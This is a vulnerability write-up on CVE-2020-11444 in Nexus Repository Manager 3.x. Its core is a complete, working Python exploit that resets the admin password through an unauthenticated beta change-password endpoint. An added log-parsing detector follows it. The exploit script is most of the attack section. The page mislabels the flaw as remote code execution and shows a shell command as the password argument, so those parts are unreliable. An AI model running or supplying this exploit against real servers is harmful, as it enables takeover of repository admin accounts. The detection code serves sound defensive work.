(CVE-2020-11444) Nexus Repository Manager Remote Code Execution Vulnerability

1. Vulnerability Overview

The vulnerability stems from improper access control. An attacker can exploit it by sending a specially crafted request that bypasses the access restrictions; as the script below shows, the request is an HTTP PUT to the beta user change-password endpoint, which allows the admin password to be reset.

2. Vulnerability Impact

Nexus Repository Manager versions 3.x through 3.21.2

3. Reproduction Steps

cve-2020-11444_exp.py
python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233"
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests

if len(sys.argv) != 4:
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
    print('+      CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password)                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <session> <password>                                            +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1].rstrip('/')
# The beta change-password endpoint is the one whose authorization check is missing (CVE-2020-11444)
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
session = sys.argv[2]   # value of an existing NXSESSIONID cookie
password = sys.argv[3]  # new admin password to set

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
    'Content-Type': "text/plain",
    'Origin': "http://127.0.0.1:8081",
    # The anti-CSRF token in the cookie must match the NX-ANTI-CSRF-TOKEN header value
    'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=" + session
}
# The request body is the new password sent as plain text
data = password

# The endpoint expects an HTTP PUT and answers 204 No Content on success
r = requests.put(vuln_url, headers=headers, data=data, timeout=10)
if r.status_code == 204:
    print("[+] Password Change Success")
    print("[+] " + url)
    print("[+] Username:admin Password:" + password)
else:
    print("[-] SessionID Not available")
    print("[-] Target Not CVE-2020-11444 Vuln Good Luck")
    sys.exit(1)
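For defenders, the request shape used above (an HTTP PUT to the beta change-password endpoint, answered with 204 on success) is what to look for in the Nexus request log. The following is an added example, not code from the original page or from exphub; it assumes a combined-log-like line layout with constructed sample lines, so the regex is an assumption to adapt to the actual request.log format of your deployment.

```python
import re

# Constructed sample lines (assumed combined-log-like layout: ip ident user [ts] "req" status bytes "ua").
# The real Nexus request.log layout may differ; adjust LINE_RE accordingly.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2020:12:00:01 +0000] "GET /service/rest/v1/status HTTP/1.1" 200 0 "curl/7.68.0"
10.0.0.7 - - [10/Apr/2020:12:00:03 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 0 "Mozilla/5.0"
10.0.0.7 - - [10/Apr/2020:12:00:05 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 403 0 "Mozilla/5.0"
10.0.0.9 - admin [10/Apr/2020:12:01:00 +0000] "PUT /service/rest/v1/security/users/bob/change-password HTTP/1.1" 204 0 "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<ua>[^"]*)"$'
)
# Matches both the beta endpoint abused by CVE-2020-11444 and the v1 one, recording which was hit
CHANGE_PW_RE = re.compile(r'^/service/rest/(?P<api>beta|v1)/security/users/(?P<target>[^/]+)/change-password$')


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match the layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_password_changes(log_text):
    """Return one finding per PUT to a change-password endpoint.

    severity is 'high' when the server answered 204 (the change succeeded) and the log
    carries no authenticated user for the request, 'info' for every other PUT to the endpoint.
    """
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or rec["method"] != "PUT":
            continue
        ep = CHANGE_PW_RE.match(rec["path"])
        if not ep:
            continue
        succeeded = rec["status"] == "204"
        anonymous = rec["user"] == "-"
        findings.append({
            "ip": rec["ip"], "ts": rec["ts"], "api": ep["api"], "target": ep["target"],
            "status": int(rec["status"]),
            "severity": "high" if succeeded and anonymous else "info",
        })
    return findings


if __name__ == "__main__":
    for finding in find_password_changes(SAMPLE_LOG):
        print(finding)
```

Any 'high' finding on the beta endpoint of an instance at or below the affected versions warrants checking whether the admin credentials were rotated and upgrading to a fixed release.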

References

https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py